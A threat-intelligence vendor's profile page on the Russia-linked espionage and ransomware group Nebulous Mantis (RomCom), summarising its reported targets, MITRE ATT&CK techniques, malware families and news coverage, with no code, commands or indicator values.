Skip to main content
Mallory
Back to threat actors
7 malware families

Nebulous Mantis

Also known asNebulous Mantis

Nebulous Mantis is a Russian-speaking, Russia-linked cyber espionage group active since at least mid-2019. It is tracked under multiple aliases including RomCom, Cuba, STORM-0978, Tropical Scorpius, UNC2596, CIGAR, and Void Rabisu. Reporting describes the group as targeting government entities, critical infrastructure, political figures, and NATO-related defense organizations, and as blending espionage activity with ransomware operations. The group initially used the Hancitor loader and pivoted to RomCom RAT in mid-2022. Its operations commonly begin with spear-phishing emails containing malicious links or weaponized documents, including lures impersonating trusted services such as OneDrive and fake PDF downloads. The infection chain includes staged payload delivery, such as Keyprov.dll, followed by RomCom backdoors and a final-stage C++ implant. RomCom uses encrypted command-and-control, living-off-the-land techniques, decentralized infrastructure including IPFS, and persistence via COM hijacking and other registry manipulation. Reported evasion includes anti-sandbox checks, time zone analysis, file renaming, and frequently rotated infrastructure. Post-compromise activity includes credential harvesting, system and network reconnaissance, Active Directory and domain enumeration, lateral movement, and data collection and staging for exfiltration. Reported tooling includes Plink for SSH tunneling, WinRAR for archiving, AD Explorer for domain enumeration, renamed Sysinternals tools, and reverse SSH tunnels. Data exfiltration is conducted over encrypted C2 channels, with archives staged in locations such as C:\Users\Public\Music. Reporting states the group frequently deploys ransomware after exfiltration to obscure espionage activity. Associated ransomware brands include Cuba ransomware, Industrial Spy, and Team Underground. PRODAFT also linked infrastructure procurement and management to an individual tracked as LARVA-290, including use of bulletproof hosting providers such as LuxHost and AEZA.

Share:
Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial
OPERATIONAL PROFILE

Targeting

Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.

Who they target

Sectors the actor has been observed targeting.

  • government
  • defense
  • critical-infrastructure
MITRE ATT&CK

Tradecraft

24 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.

11 of 15 tactics32 techniques×N= number of intelligence reports citing this technique
MITRE ATT&CK
TA0001
Initial Access
1 technique
T1566
Phishing
T1566.001
Spearphishing Attachment
T1566.002
Spearphishing Link
TA0003
Persistence
2 techniques
T1546
Event Triggered Execution
T1546.015×2
Component Object Model Hijacking
T1547
Boot or Logon Autostart Execution
T1547.001×2
Registry Run Keys / Startup Folder
TA0004
Privilege Escalation
2 techniques
T1546
Event Triggered Execution
T1546.015×2
Component Object Model Hijacking
T1547
Boot or Logon Autostart Execution
T1547.001×2
Registry Run Keys / Startup Folder
TA0005
Stealth
2 techniques
T1036
Masquerading
T1497×2
Virtualization/Sandbox Evasion
TA0006
Credential Access
1 technique
T1555
Credentials from Password Stores
TA0007
Discovery
6 techniques
T1016
System Network Configuration Discovery
T1018
Remote System Discovery
T1082×2
System Information Discovery
T1083
File and Directory Discovery
T1482×2
Domain Trust Discovery
T1497×2
Virtualization/Sandbox Evasion
TA0008
Lateral Movement
1 technique
T1021
Remote Services
T1021.004
SSH
TA0009
Collection
3 techniques
T1005
Data from Local System
T1074
Data Staged
T1560
Archive Collected Data
T1560.001
Archive via Utility
TA0011
Command and Control
4 techniques
T1105×3
Ingress Tool Transfer
T1568
Dynamic Resolution
T1572
Protocol Tunneling
T1573×2
Encrypted Channel
TA0010
Exfiltration
1 technique
T1041×2
Exfiltration Over C2 Channel
TA0040
Impact
1 technique
T1486×2
Data Encrypted for Impact
ARSENAL

Associated malware families

7 malware families attributed to this actor across reporting.

FamilyContextEvidenceLast seen
Hancitor"Initially relying on the Hancitor loader, the group pivoted in mid-2022 to RomCom..."3Mar 18, 2026
Cuba"Their ransomware arsenal evolved over time: Cuba ransomware (early 2020)..."2Mar 18, 2026
Industrial SpyAfter March 2022, attacks using Cuba ransomware were entirely replaced by Industrial Spy, which appears to be a continuation of the former.2Mar 18, 2026
RomCom"...the group’s primary weapon of choice is the RomCom remote access trojan (RAT)—a versatile tool enabling both data exfiltration and ransomware deployment."2Mar 18, 2026
RomCom RAT"...Nebulous Mantis that has deployed a remote access trojan called RomCom RAT since mid-2022."2Mar 18, 2026

2 additional families tracked in Mallory.

IOCS

Observables

1 indicator attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.

1 IOCsView more in app

IOC values are gated. View more in Mallory for domains, IPs, hashes, and other artifacts, or pipe them straight into your SIEM.

ACTIVITY FEED

Recent activity

4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

4 SOURCESView more in app
cloudatg insightsNews
Feb 13, 2026
AI Development & Software Engineering | CloudATG

Russian-speaking espionage group using RomCom RAT in multi-stage intrusions against NATO-linked entities, with LOTL and encrypted C2 noted.

Read more
security online infoNews
May 3, 2025
Nebulous Mantis Cyber Espionage Group: RomCom RAT and Hybrid Tactics

Hybrid espionage + ransomware operations since mid-2019. Uses multi-phase intrusions starting with spear-phishing, then RomCom RAT for execution/persistence/C2, credential harvesting, discovery, and data exfiltration; often deploys ransomware to cover tracks.

Read more
the hacker newsNews
Apr 30, 2025
Nebulous Mantis Targets NATO-Linked Entities with Multi-Stage Malware Attacks

Russian-speaking espionage-focused intrusion set using spear-phishing to deliver RomCom RAT, leveraging bulletproof hosting and encrypted C2; targets critical infrastructure, government, political leaders, and NATO-related defense organizations; conducts credential theft, AD enumeration, lateral movement, and data collection/exfiltration.

Read more
securityaffairsNews
Apr 30, 2025
Russia-linked group Nebulous Mantis targets NATO-related defense organizations

Russia-linked, Russian-speaking espionage-focused intrusion set targeting NATO-related defense organizations and other critical entities. Uses spear-phishing to deliver RomCom for espionage, lateral movement, credential theft, AD/domain enumeration, and data exfiltration; commonly follows theft with ransomware deployment to cover activity and monetize/impact victims.

Read more
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.
Start free trial
Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping24

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal7

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables1

Domains, IPs, and hashes tied to this actor, refreshed continuously.